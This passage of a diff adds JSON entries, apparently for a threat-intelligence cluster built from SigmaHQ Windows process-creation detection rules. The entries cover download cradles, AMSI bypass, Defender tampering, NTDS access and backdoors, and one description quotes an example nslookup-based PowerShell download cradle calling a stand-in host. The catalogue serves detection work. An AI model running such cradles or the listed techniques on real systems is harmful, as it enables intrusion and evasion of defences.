"2022/09/05", + "filename": "proc_creation_win_nslookup_poweshell_download.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]", + "uuid": "72671447-4352-4413-bb91-b85569687135", + "value": "Nslookup PwSh Download Cradle", + "meta": { + "refs": [ + "https://twitter.com/alh4zr3d/status/1566489367232651264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.t1071.004" + ], + "creation_date": "2022/09/06", + "filename": "proc_creation_win_nslookup_pwsh_download_cradle.yml", + "author": "Zach Mathis (@yamatosecurity)", + "level": "medium", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + "uuid": "2afafd61-6aae-4df4-baed-139fa1f4c345", + "value": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", + "meta": { + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_ntdsutil_usage.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "NTDS maintenance" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of the Windows 8.3 
short name. Which could be used as a method to avoid command-line detection", + "uuid": "349d891d-fef0-4fe4-bc53-eee623a15969", + "value": "Use Short Name Path in Command Line", + "meta": { + "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/frack113/status/1555830623633375232", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2022/08/07", + "filename": "proc_creation_win_ntfs_short_name_path_use_cli.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid Image detection", + "uuid": "a96970af-f126-420d-90e1-d37bf25e50e1", + "value": "Use Short Name Path in Image", + "meta": { + "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/frack113/status/1555830623633375232", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2022/08/07", + "filename": "proc_creation_win_ntfs_short_name_path_use_image.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid command-line detection", + "uuid": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", + "value": "Use NTFS Short Name in Command Line", + "meta": { + "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2022/08/05", + "filename": "proc_creation_win_ntfs_short_name_use_cli.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid Image based detection", + "uuid": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", + "value": "Use NTFS Short Name in Image", + "meta": { + "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2022/08/06", + "filename": "proc_creation_win_ntfs_short_name_use_image.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", + "uuid": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", + "value": "Obfuscated IP Download", + "meta": { + "refs": [ + "https://h.43z.one/ipconverter/", + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml" + ], + "tags": [ + "attack.discovery" + ], + "creation_date": "2022/08/03", + "filename": "proc_creation_win_obfuscated_ip_download.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) 
via commandline", + "uuid": "56d19cb4-6414-4769-9644-1ed35ffbb148", + "value": "Obfuscated IP Via CLI", + "meta": { + "refs": [ + "https://h.43z.one/ipconverter/", + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml" + ], + "tags": [ + "attack.discovery" + ], + "creation_date": "2022/08/03", + "filename": "proc_creation_win_obfuscated_ip_via_cli.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", + "uuid": "518643ba-7d9c-4fa5-9f37-baed36059f6a", + "value": "Office Applications Spawning Wmi Cli", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_applications_spawning_wmi_commandline.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_office_applications_spawning_wmi_commandline.yml", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Office Applications executing a Windows child process including directory traversal patterns", + "uuid": "868955d9-697e-45d4-a3da-360cefd7c216", + "value": "Office Directory Traversal 
CommandLine", + "meta": { + "refs": [ + "https://twitter.com/sbousseaden/status/1531653369546301440", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2022/06/02", + "filename": "proc_creation_win_office_dir_traversal_cli.yml", + "author": "@SBousseaden (idea), Christian Burkard (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "uuid": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "value": "Office Processes Proxy Execution Through WMIC", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_proxy_exec_wmic.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_office_proxy_exec_wmic.yml", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio", + "uuid": "438025f9-5856-4663-83f7-52f878a70a50", + "value": "Microsoft Office Product Spawning 
Windows Shell", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_shell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2018/04/06", + "filename": "proc_creation_win_office_shell.yml", + "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", + "uuid": "04f5363a-6bca-42ff-be70-0d28bf629ead", + "value": "Office Applications Spawning Wmi Cli Alternate", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawning_wmi_commandline.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_office_spawning_wmi_commandline.yml", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects an executable in the users directory started from Microsoft Word, Excel, Powerpoint, Publisher or Visio", + "uuid": 
"aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "value": "MS Office Product Spawning Exe in User Dir", + "meta": { + "refs": [ + "sha256=23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57c", + "https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" + ], + "creation_date": "2019/04/02", + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml", + "author": "Jason Lynch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects svchost process spawning an instance of an office application. This happens when the initial word application create an instance of one of the office COM objects such as 'Word.Application', 'Excel.Application'...etc. This can be used by malicious actor to create a malicious office document with macros on the fly. 
(See vba2clr project in reference)", + "uuid": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "value": "Svchost Spawning Office Application", + "meta": { + "refs": [ + "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic", + "https://github.com/med0x2e/vba2clr", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2022/10/13", + "filename": "proc_creation_win_office_svchost_child.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of office automation via scripting" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Outlook", + "uuid": "208748f7-881d-47ac-a29c-07ea84bf691d", + "value": "Microsoft Outlook Product Spawning Windows Shell", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_outlook_shell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2022/02/28", + "filename": "proc_creation_win_outlook_shell.yml", + "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", + 
"uuid": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", + "value": "Suspicious Execution Of PDQDeployRunner", + "meta": { + "refs": [ + "https://twitter.com/malmoeb/status/1550483085472432128", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/07/22", + "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of the PDQDeploy tool to execute these commands" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of PDQ Deploy remote admin tool", + "uuid": "d679950c-abb7-43a6-80fb-2a480c4fc450", + "value": "Use of PDQ Deploy Remote Adminstartion Tool", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md", + "https://www.pdq.com/pdq-deploy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdq_deploy.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1072" + ], + "creation_date": "2022/10/01", + "filename": "proc_creation_win_pdq_deploy.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. 
Which might indicate persistence attempt", + "uuid": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "value": "Persistence Via TypedPaths - CommandLine", + "meta": { + "refs": [ + "https://twitter.com/dez_/status/1560101453150257154", + "https://forensafe.com/blogs/typedpaths.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/08/22", + "filename": "proc_creation_win_persistence_typed_paths.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "uuid": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", + "value": "Pingback Backdoor", + "meta": { + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pingback_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.001" + ], + "creation_date": "2021/05/05", + "filename": "proc_creation_win_pingback_backdoor.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Very unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location", + "uuid": "aeab5ec5-be14-471a-80e8-e344418305c2", + "value": "Executable Used by PlugX in Uncommon Location", + "meta": { + "refs": [ + "http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/", + 
"https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml" + ], + "tags": [ + "attack.s0013", + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2017/06/12", + "filename": "proc_creation_win_plugx_susp_exe_locations.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "uuid": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", + "value": "Possible Privilege Escalation via Service Permissions Weakness", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1574.011" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml", + "author": "Teymur Kheirkhabarov", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Request to amsiInitFailed that can be used to disable AMSI Scanning", + "uuid": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "value": "Powershell AMSI Bypass via .NET Reflection", + "meta": { + "refs": [ + "https://twitter.com/mattifestation/status/735261176745988096", + 
"https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2018/08/17", + "filename": "proc_creation_win_powershell_amsi_bypass.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects audio capture via PowerShell Cmdlet.", + "uuid": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "value": "Audio Capture via PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", + "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_powershell_audio_capture.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate audio capture by legitimate user." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Base64 encoded Shellcode", + "uuid": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", + "value": "PowerShell Base64 Encoded Shellcode", + "meta": { + "refs": [ + "https://twitter.com/cyb3rops/status/1063072865992523776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_b64_shellcode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2018/11/17", + "filename": "proc_creation_win_powershell_b64_shellcode.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific encoding method of cOnvErTTO-SECUreStRIng in the PowerShell command lines", + "uuid": "74403157-20f5-415d-89a7-c505779585cf", + "value": "Encoded PowerShell Command Line Usage of ConvertTo-SecureString", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/11", + "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the PowerShell command lines with reversed strings", + "uuid": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "value": "Suspicious PowerShell Cmdline", + "meta": { + "refs": [ + 
"https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/11", + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the PowerShell command lines with special characters", + "uuid": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "value": "Suspicious PowerShell Command Line", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "level": "high", + "falsepositive": [ + "Unlikely", + "Amazon SSM Document Worker", + "Windows Defender ATP" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific combinations of encoding methods in the PowerShell command lines", + "uuid": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", + "value": "Encoded PowerShell Command Line", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", 
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/11", + "filename": "proc_creation_win_powershell_cmdline_specific_comb_methods.yml", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "level": "low", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific combinations of encoding methods in the PowerShell command lines", + "uuid": "5b572dcf-254b-425c-a8c5-d9af6bea35a6", + "value": "Suspicious Xor PowerShell Command Line", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_susp_comb_methods.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/07/06", + "filename": "proc_creation_win_powershell_cmdline_susp_comb_methods.yml", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV", + "uuid": "c6fb44c6-71f5-49e6-9462-1425d328aee3", + "value": "Powershell Defender Base64 MpPreference", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_base64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/03/04", + "filename": "proc_creation_win_powershell_defender_base64.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects requests to disable Microsoft Defender features using PowerShell commands", + "uuid": "1ec65a5f-9473-4f12-97da-622044d6df21", + "value": "Powershell Defender Disable Scan Feature", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", + "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", + "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/03/03", + "filename": "proc_creation_win_powershell_defender_disable_feature.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", + "uuid": 
"17769c90-230e-488b-a463-e05c08e9d48f", + "value": "Powershell Defender Exclusion", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/04/29", + "filename": "proc_creation_win_powershell_defender_exclusion.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell Strings applied to rundll as seen in PowerShdll.dll", + "uuid": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "value": "Detection of PowerShell Execution via DLL", + "meta": { + "refs": [ + "https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_dll_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2018/08/25", + "filename": "proc_creation_win_powershell_dll_execution.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + 